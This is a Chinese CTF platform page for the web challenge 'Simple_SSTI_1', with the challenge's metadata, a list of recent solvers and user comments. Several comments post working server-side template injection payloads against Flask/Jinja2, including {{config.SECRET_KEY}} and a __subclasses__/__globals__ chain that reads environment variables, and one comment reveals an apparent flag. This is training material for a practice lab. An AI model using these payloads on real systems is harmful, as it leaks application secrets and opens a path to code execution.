Simple_SSTI_1WEB 未解决
分数:
5
金币:
2
题目作者:
valecalida
一 血:
dotast
一血奖励:
2金币
解 决:
28675
提 示:
描 述:
Simple_SSTI_1
评分(50)
解题动态
scv 攻破了该题 18小时前
xiaoxiaojiangshi 攻破了该题 1天前
一只小白鲸 攻破了该题 2天前
xyqsin 攻破了该题 2天前
flag大王 攻破了该题 2天前
Soraha 攻破了该题 6天前
0xchang 攻破了该题 7天前
chenzhong 攻破了该题 9天前
猛狗突击 攻破了该题 10天前
kiritoldws 攻破了该题 10天前
WYYYYTT 攻破了该题 11天前
等往事风中吹‘ 攻破了该题 11天前
213qwe 攻破了该题 11天前
muerjing 攻破了该题 12天前
有点易斯但不多 攻破了该题 12天前
AzKanna 攻破了该题 13天前
baka 攻破了该题 13天前
wes 攻破了该题 14天前
kangwendong 攻破了该题 15天前
评论
litt 23天前
举报
flag={{config}}都直接爆出flag了
y1 1月前
举报
http://171.80.2.169:15802/?flag={{config.SECRET_KEY}}
xshzgjshpy 1月前
举报
http://171.80.2.169:10541/?flag={{config['SECRET_KEY']}}
cfggfbfxdgbb 2月前
举报
?flag={{''.__class__.__base__.__subclasses__()[127].__init__.__globals__['environ']}}
LeoCHAn 5月前
举报
flag{********}
merrymu 7月前
举报
模板注入(Server-Side Template Injection,SSTI)是一种通过将恶意代码注入服务器端模板来执行非授权操作的安全漏洞,主要成因是开发者未对用户输入进行有效过滤,导致攻击者可利用模板引擎特性实现远程代码执行、敏感信息泄露等高危操作。 基本探测:输入{{2*2}},若返回4则存在漏洞。
HK1ng 10月前
举报
还真是简单模板注入,甚至不需要利用方法,首先传参{{7*7}}验证是否执行了语句,看到页面出现49,就知道这里存在模板注入,然后查看一下配置文件,就发现了flag。{{config}}
看writeup刷题 10月前
举报
咋SECRET_KEY还必须大写
Wang_Micro 1年前
举报
?flag={{config.SECRET_KEY}} flag{4c1f57d8ba21815847e7d477c3c86b81}
超爱西西鸭 1年前
举报
/?flag={{config.SECRET_KEY}}